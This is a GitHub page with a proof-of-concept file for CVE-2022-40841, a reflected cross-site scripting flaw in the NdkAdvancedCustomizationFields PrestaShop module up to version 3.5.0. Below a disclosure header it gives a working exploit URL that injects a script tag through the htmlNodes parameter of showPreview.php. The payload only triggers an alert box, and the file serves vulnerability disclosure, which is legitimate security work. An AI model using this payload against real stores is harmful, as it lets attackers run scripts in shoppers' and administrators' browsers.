Headline
CVE-2022-40841: cve-s/poc.txt at main · daaaalllii/cve-s
A cross-site scripting (XSS) vulnerability in NdkAdvancedCustomizationFields v3.5.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payloads injected into the “htmlNodes” parameter.
Permalink
# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 Reflected cross site scripting (xss)
# Date: 01-11-2022
# Exploit Author: dalii
# Vendor Homepage: https://www.ndk-design.fr/
# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english
# Version: 3.5.0
# Tested on: Windows 10
# CVE: CVE-2022-40841
Parameters: htmlNodes
Exploit:
http://localhost/modules/ndk_advanced_custom_fields/showPreview.php?htmlNodes=<script>alert(‘xss’)</script>